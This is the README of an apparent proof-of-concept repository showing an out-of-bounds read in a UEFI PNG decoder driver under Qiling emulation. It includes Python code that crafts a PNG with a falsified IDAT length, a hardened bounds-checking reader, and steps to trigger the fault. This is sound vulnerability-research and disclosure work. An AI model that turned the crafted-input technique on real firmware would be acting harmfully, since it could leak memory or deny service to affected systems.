NetSPI/OOBRead_UEFI_Example

README: Emulating and Exploiting UEFI Example

Project Overview

This proof of concept (PoC) demonstrates a heap-based buffer overflow and an out-of-bounds read in the PngDecoderDxe.bin UEFI driver.

The driver's PNG decompression loop does not validate the chunk length field against the data actually present, so a malformed IDAT chunk can make the decoder read or write past the intended memory boundaries.

File Descriptions

- poc.py: The Qiling-based emulation script used for active testing.
- lenna.gold: A valid PNG file (473,831 bytes) used for passive reconnaissance to establish a baseline of "good" behavior.
- lenna.poisoned: A malformed PNG file with a manipulated IDAT length field designed to trigger the memory corruption.
- PngDecoderDxe.bin: The target UEFI driver.
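The mutation behind lenna.poisoned, and the check the decoder is missing, can be shown without the driver. The following is an added example written for this README; it is not the repository's poc.py and does not reproduce the lenna files. It builds a constructed minimal PNG in memory, rewrites the first IDAT chunk's 4-byte length field (the assumed mutation class; the exact bytes of lenna.poisoned are not given here), walks the chunks the way a decoder that trusts the length field would, and contrasts that with a reader that bounds-checks every chunk before touching its data:

```python
"""Craft an IDAT-length-poisoned PNG and show the missing bounds check.
Added example, not the repository's code; sample image is constructed."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: big-endian length, 4-byte type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png(width: int = 2, height: int = 2) -> bytes:
    """Constructed 8-bit RGB image; a stand-in for lenna.gold, which is not reproduced here."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    # Each scanline starts with filter byte 0 (None) followed by width RGB pixels.
    raw = b"".join(b"\x00" + b"\xaa\xbb\xcc" * width for _ in range(height))
    return (PNG_SIG + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(raw))
            + png_chunk(b"IEND", b""))


def poison_idat_length(png: bytes, claimed_len: int) -> bytes:
    """Overwrite the first IDAT chunk's length field and leave every other byte alone.
    Assumption: this is the mutation class lenna.poisoned uses; its bytes are not on the page."""
    off = png.index(b"IDAT") - 4          # the length field sits just before the type
    return png[:off] + struct.pack(">I", claimed_len) + png[off + 4:]


def chunk_table(png: bytes) -> list:
    """Walk chunks the way a naive decoder does, trusting each length field.
    Returns (type, declared_length, bytes_actually_available) per chunk."""
    out, pos = [], len(PNG_SIG)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        out.append((ctype, length, len(png) - (pos + 8)))
        pos += 8 + length + 4              # a lying length jumps straight past EOF
    return out


def decode_checked(png: bytes) -> bytes:
    """Hardened reader: reject a chunk whose declared length exceeds the bytes present,
    verify its CRC, then inflate the IDAT stream. Returns the raw scanlines."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, idat = len(PNG_SIG), b""
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        end = pos + 8 + length             # Python ints cannot wrap; in C this sum can overflow too
        if end + 4 > len(png):             # the check the driver's loop lacks
            raise ValueError(f"{ctype.decode()} declares {length} bytes, "
                             f"only {len(png) - pos - 8} present")
        data = png[pos + 8:end]
        (crc,) = struct.unpack(">I", png[end:end + 4])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"{ctype.decode()} CRC mismatch")
        if ctype == b"IDAT":
            idat += data
        pos = end + 4
    return zlib.decompress(idat)


def is_well_formed(png: bytes) -> bool:
    """True if the hardened reader accepts the file, False if it rejects it."""
    try:
        decode_checked(png)
        return True
    except (ValueError, zlib.error):
        return False


if __name__ == "__main__":
    gold = build_png()
    bad = poison_idat_length(gold, 0x7FFFFFFF)
    for name, img in (("gold", gold), ("poisoned", bad)):
        print(name, chunk_table(img))
        print(name, "accepted" if is_well_formed(img) else "rejected")
```

The naive walk over the poisoned file shows the core of the bug: the IDAT entry declares 0x7FFFFFFF bytes while only a few dozen exist, and a loop that copies or inflates "length" bytes from that point runs off the end of the buffer. The hardened reader refuses the chunk before reading any of it, which is the validation the README says the driver's decompression loop is missing.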

Prerequisites & Installation

This project requires the Qiling Framework to emulate the UEFI environment. It is recommended to use a virtual environment to manage dependencies.

  1. Clone and install dependencies:

```bash
# Clone the Qiling repository
git clone https://github.com/qilingframework/qiling.git
cd qiling

# Install Qiling and its dependencies
pip3 install -r requirements.txt
python3 setup.py install
```

Instructions for Testing

To validate the vulnerability, follow these steps:

  1. Baseline test (the "gold" image): confirm the driver handles valid data correctly within the 473,831-byte boundary (the image size).

```bash
cp lenna.gold lenna.png
python3 poc.py
```

Expected result: the script should report "FINAL EXTRACTION: Dumping from 0x60419000". Note: ignore the "decompression failed" message; the script ends emulation before decoding completes.

  2. Vulnerability test (the "poisoned" image): trigger the out-of-bounds read by providing the malformed asset.

```bash
cp lenna.poisoned lenna.png
python3 poc.py
```

Expected result: the script will report a CRITICAL SYSTEM ABORT at the page boundary 0x9076000, the point at which the decoder's read runs past the end of the image buffer. Note that this address is specific to the emulated memory layout; on real hardware the read lands wherever the decoder's heap buffer sits.

Impact: this demonstrates an arbitrary out-of-bounds read that could leak information or cause a denial of service (DoS) of the BIOS.

About

Demonstrating UEFI emulation techniques for identifying security vulnerabilities in extracted firmware binaries.
